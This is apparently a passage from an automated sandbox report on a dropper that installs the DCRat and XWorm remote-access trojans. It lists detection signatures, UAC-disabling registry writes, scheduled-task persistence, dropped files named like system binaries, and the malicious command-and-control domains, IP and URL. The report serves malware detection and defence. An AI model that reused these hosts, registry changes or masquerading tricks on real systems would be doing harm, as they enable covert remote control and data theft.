              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Users\user\cmd.exeQueries volume information: C:\Users\user\cmd.exe VolumeInformation
              Source: C:\Users\user\cmd.exeQueries volume information: C:\Users\user\cmd.exe VolumeInformation
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeQueries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe VolumeInformation
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeQueries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe VolumeInformation
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeQueries volume information: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe VolumeInformation
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeQueries volume information: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F1D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,3_2_00F1D5D4
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F0ACF5 GetVersionExW,3_2_00F0ACF5
              Source: C:\Users\user\Desktop\cougif6lqM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Disable UAC(promptonsecuredesktop)
              Source: C:\Componenthost\providerreviewdhcp.exeRegistry value created: PromptOnSecureDesktop 0Jump to behavior
              Disables UAC (registry)
              Source: C:\Componenthost\providerreviewdhcp.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
              Source: javaclient.exe, 00000002.00000002.3771177110.000000001C07C000.00000004.00000020.00020000.00000000.sdmp, javaclient.exe, 00000002.00000002.3752340914.000000000147C000.00000004.00000020.00020000.00000000.sdmp, javaclient.exe, 00000002.00000002.3771177110.000000001BFD0000.00000004.00000020.00020000.00000000.sdmp, javaclient.exe, 00000002.00000002.3752340914.0000000001546000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: javaclient.exe, 00000002.00000002.3771177110.000000001C067000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Defender\MsMpeng.exe
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected DCRat
              Source: Yara matchFile source: 00000028.00000002.1513471393.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002A.00000002.1517396761.0000000003371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.1513885055.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.1383062846.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.1513885055.000000000312D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000029.00000002.1518454359.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.1505051021.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.1383062846.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000028.00000002.1513471393.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.1482114467.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.1384672432.0000000012BEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: providerreviewdhcp.exe PID: 7552, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7200, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1688, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe PID: 7628, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe PID: 7312, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Memory Compression.exe PID: 7908, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Memory Compression.exe PID: 7984, type: MEMORYSTR
              Yara detected XWorm
              Source: Yara matchFile source: 2.0.javaclient.exe.ec0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000000.1327658991.0000000000EC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: javaclient.exe PID: 7396, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\javaclient.exe, type: DROPPED

              Remote Access Functionality

              barindex
              Yara detected DCRat
              Source: Yara matchFile source: 00000028.00000002.1513471393.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002A.00000002.1517396761.0000000003371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.1513885055.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.1383062846.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.1513885055.000000000312D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000029.00000002.1518454359.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.1505051021.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.1383062846.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000028.00000002.1513471393.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.1482114467.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.1384672432.0000000012BEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: providerreviewdhcp.exe PID: 7552, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7200, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1688, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe PID: 7628, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe PID: 7312, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Memory Compression.exe PID: 7908, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Memory Compression.exe PID: 7984, type: MEMORYSTR
              Yara detected XWorm
              Source: Yara matchFile source: 2.0.javaclient.exe.ec0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000000.1327658991.0000000000EC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: javaclient.exe PID: 7396, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\javaclient.exe, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information11
              Scripting              		Valid Accounts211
              Windows Management Instrumentation              		11
              Scripting              		1
              DLL Side-Loading              		21
              Disable or Modify Tools              		OS Credential Dumping1
              System Time Discovery              		Remote Services11
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              Bypass User Account Control              		11
              Deobfuscate/Decode Files or Information              		LSASS Memory2
              File and Directory Discovery              		Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		11
              Process Injection              		3
              Obfuscated Files or Information              		Security Account Manager37
              System Information Discovery              		SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              PowerShell              		21
              Registry Run Keys / Startup Folder              		1
              Scheduled Task/Job              		24
              Software Packing              		NTDS241
              Security Software Discovery              		Distributed Component Object ModelInput Capture11
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		LSA Secrets1
              Process Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Bypass User Account Control              		Cached Domain Credentials131
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items213
              Masquerading              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
              Virtualization/Sandbox Evasion              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
              Process Injection              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1488678 Sample: cougif6lqM.exe Startdate: 06/08/2024 Architecture: WINDOWS Score: 100 76 light-liable.gl.at.ply.gg 2->76 78 a1013249.xsph.ru 2->78 90 Multi AV Scanner detection for domain / URL 2->90 92 Found malware configuration 2->92 94 Malicious sample detected (through community Yara rule) 2->94 96 21 other signatures 2->96 12 cougif6lqM.exe 4 2->12         started        15 cmd.exe 2->15         started        18 cmd.exe 2->18         started        20 4 other processes 2->20 signatures3 process4 file5 70 C:\Users\user\AppData\...\javaclient.exe, PE32 12->70 dropped 72 C:\Users\user\AppData\...\DCRatBuild.exe, PE32 12->72 dropped 74 C:\Users\user\AppData\...\cougif6lqM.exe.log, CSV 12->74 dropped 22 DCRatBuild.exe 3 6 12->22         started        26 javaclient.exe 1 4 12->26         started        116 Antivirus detection for dropped file 15->116 118 Multi AV Scanner detection for dropped file 15->118 120 Machine Learning detection for dropped file 15->120 signatures6 process7 dnsIp8 66 C:\Componenthost\providerreviewdhcp.exe, PE32 22->66 dropped 68 C:\Componenthost\aZjsojBpBtPKe.vbe, data 22->68 dropped 98 Antivirus detection for dropped file 22->98 100 Multi AV Scanner detection for dropped file 22->100 102 Machine Learning detection for dropped file 22->102 29 wscript.exe 1 22->29         started        80 light-liable.gl.at.ply.gg 147.185.221.17, 10314, 49715, 49716 SALSGIVERUS United States 26->80 104 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 26->104 106 Protects its processes via BreakOnTermination flag 26->106 108 Bypasses PowerShell execution policy 26->108 110 2 other signatures 26->110 32 powershell.exe 26->32         started        34 schtasks.exe 26->34         started        file9 signatures10 process11 signatures12 112 Windows Scripting host queries suspicious COM object (likely to drop second stage) 29->112 36 cmd.exe 1 29->36         started        114 Loading BitLocker PowerShell Module 32->114 38 conhost.exe 32->38         started        40 schtasks.exe 34->40         started        42 schtasks.exe 34->42         started        44 schtasks.exe 34->44         started        46 9 other processes 34->46 process13 process14 48 providerreviewdhcp.exe 4 20 36->48         started        52 conhost.exe 36->52         started        file15 58 C:\Users\user\cmd.exe, PE32 48->58 dropped 60 C:\...\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe, PE32 48->60 dropped 62 C:\Recovery\csrss.exe, PE32 48->62 dropped 64 5 other malicious files 48->64 dropped 82 Antivirus detection for dropped file 48->82 84 Multi AV Scanner detection for dropped file 48->84 86 Machine Learning detection for dropped file 48->86 88 5 other signatures 48->88 54 cmd.exe 48->54         started        signatures16 process17 process18 56 conhost.exe 54->56         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              cougif6lqM.exe79%ReversingLabsByteCode-MSIL.Trojan.XWormRAT
              cougif6lqM.exe59%VirustotalBrowse
              cougif6lqM.exe100%AviraTR/Dropper.Gen
              cougif6lqM.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Componenthost\providerreviewdhcp.exe100%AviraHEUR/AGEN.1323984
              C:\Users\user\AppData\Local\Temp\DCRatBuild.exe100%AviraVBS/Runner.VPG
              C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe100%AviraHEUR/AGEN.1323984
              C:\Componenthost\aZjsojBpBtPKe.vbe100%AviraVBS/Runner.VPG
              C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe100%AviraHEUR/AGEN.1323984
              C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe100%AviraHEUR/AGEN.1323984
              C:\Users\user\AppData\Local\Temp\8o9UezPTg6.bat100%AviraBAT/Delbat.C
              C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe100%AviraHEUR/AGEN.1323984
              C:\Users\user\cmd.exe100%AviraHEUR/AGEN.1323984
              C:\Program Files\Windows Mail\WmiPrvSE.exe100%AviraHEUR/AGEN.1323984
              C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe100%AviraHEUR/AGEN.1323984
              C:\Componenthost\providerreviewdhcp.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\DCRatBuild.exe100%Joe Sandbox ML
              C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe100%Joe Sandbox ML
              C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\javaclient.exe100%Joe Sandbox ML
              C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe100%Joe Sandbox ML
              C:\Users\user\cmd.exe100%Joe Sandbox ML
              C:\Program Files\Windows Mail\WmiPrvSE.exe100%Joe Sandbox ML
              C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe100%Joe Sandbox ML
              C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe88%ReversingLabsWin32.Ransomware.Prometheus
              C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe68%VirustotalBrowse
              C:\Componenthost\providerreviewdhcp.exe88%ReversingLabsWin32.Ransomware.Prometheus
              C:\Componenthost\providerreviewdhcp.exe68%VirustotalBrowse
              C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe88%ReversingLabsWin32.Ransomware.Prometheus
              C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe68%VirustotalBrowse
              C:\Program Files\Windows Mail\WmiPrvSE.exe88%ReversingLabsWin32.Ransomware.Prometheus
              C:\Program Files\Windows Mail\WmiPrvSE.exe68%VirustotalBrowse
              C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe88%ReversingLabsWin32.Ransomware.Prometheus
              C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe68%VirustotalBrowse
              C:\Recovery\csrss.exe88%ReversingLabsWin32.Ransomware.Prometheus
              C:\Recovery\csrss.exe68%VirustotalBrowse
              C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe88%ReversingLabsWin32.Ransomware.Prometheus
              C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe68%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\DCRatBuild.exe70%ReversingLabsWin32.Trojan.Uztuby
              C:\Users\user\AppData\Local\Temp\DCRatBuild.exe59%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\javaclient.exe92%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
              C:\Users\user\AppData\Local\Temp\javaclient.exe68%VirustotalBrowse
              C:\Users\user\cmd.exe88%ReversingLabsWin32.Ransomware.Prometheus
              C:\Users\user\cmd.exe68%VirustotalBrowse

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              bg.microsoft.map.fastly.net0%VirustotalBrowse
              a1013249.xsph.ru13%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              http://a1013249.xsph.ru/@=UGO0gTOkVjZ100%Avira URL Cloudmalware
              light-liable.gl.at.ply.gg0%Avira URL Cloudsafe
              https://github.com/Pester/Pester1%VirustotalBrowse
              http://a1013249.xsph.ru/@=UGO0gTOkVjZ3%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              		199.232.214.172
              		truefalseunknown
              light-liable.gl.at.ply.gg
              		147.185.221.17
              		truetrue
                		unknown
                a1013249.xsph.ru
                		141.8.192.26
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://a1013249.xsph.ru/@=UGO0gTOkVjZtrue
                • 3%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                light-liable.gl.at.ply.ggtrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000017.00000002.1446622675.000002265D836000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000017.00000002.1410489959.000002264D9E9000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000017.00000002.1410489959.000002264D9E9000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000017.00000002.1410489959.000002264D9E9000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000017.00000002.1410489959.000002264D9E9000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/powershell.exe, 00000017.00000002.1446622675.000002265D836000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000017.00000002.1446622675.000002265D836000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000017.00000002.1446622675.000002265D836000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000017.00000002.1446622675.000002265D836000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://aka.ms/pscore68powershell.exe, 00000017.00000002.1410489959.000002264D7C1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namejavaclient.exe, 00000002.00000002.3755345710.0000000003271000.00000004.00000800.00020000.00000000.sdmp, providerreviewdhcp.exe, 00000007.00000002.1383062846.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1410489959.000002264D7C1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://github.com/Pester/Pesterpowershell.exe, 00000017.00000002.1410489959.000002264D9E9000.00000004.00000800.00020000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                147.185.221.17
                		light-liable.gl.at.ply.ggUnited States
                		12087SALSGIVERUStrue

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1488678
                Start date and time:2024-08-06 11:51:07 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 11m 2s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:46
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:cougif6lqM.exe
                renamed because original name is a hash value
                Original Sample Name:2bbc8212c548dcb848224a882b32492a.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@45/32@2/1
                EGA Information:
                • Successful, ratio: 20%
                HCA Information:
                • Successful, ratio: 65%
                • Number of executed functions: 433
                • Number of non-executed functions: 67
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, csrss.exe, schtasks.exe, WmiPrvSE.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target Memory Compression.exe, PID 7908 because it is empty
                • Execution Graph export aborted for target Memory Compression.exe, PID 7984 because it is empty
                • Execution Graph export aborted for target cmd.exe, PID 7200 because it is empty
                • Execution Graph export aborted for target cougif6lqM.exe, PID 7276 because it is empty
                • Execution Graph export aborted for target hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe, PID 7312 because it is empty
                • Execution Graph export aborted for target hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe, PID 7628 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 2128 because it is empty
                • Execution Graph export aborted for target providerreviewdhcp.exe, PID 7552 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                05:52:01API Interceptor22x Sleep call for process: powershell.exe modified
                05:52:13API Interceptor13576201x Sleep call for process: javaclient.exe modified
                10:52:00Task SchedulerRun new task: cmd path: "C:\Users\user\cmd.exe"
                10:52:00Task SchedulerRun new task: cmdc path: "C:\Users\user\cmd.exe"
                10:52:00Task SchedulerRun new task: csrss path: "C:\Recovery\csrss.exe"
                10:52:00Task SchedulerRun new task: csrssc path: "C:\Recovery\csrss.exe"
                10:52:00Task SchedulerRun new task: hvxmowIikyCfRrhhAMpWFavmEnuKtL path: "C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe"
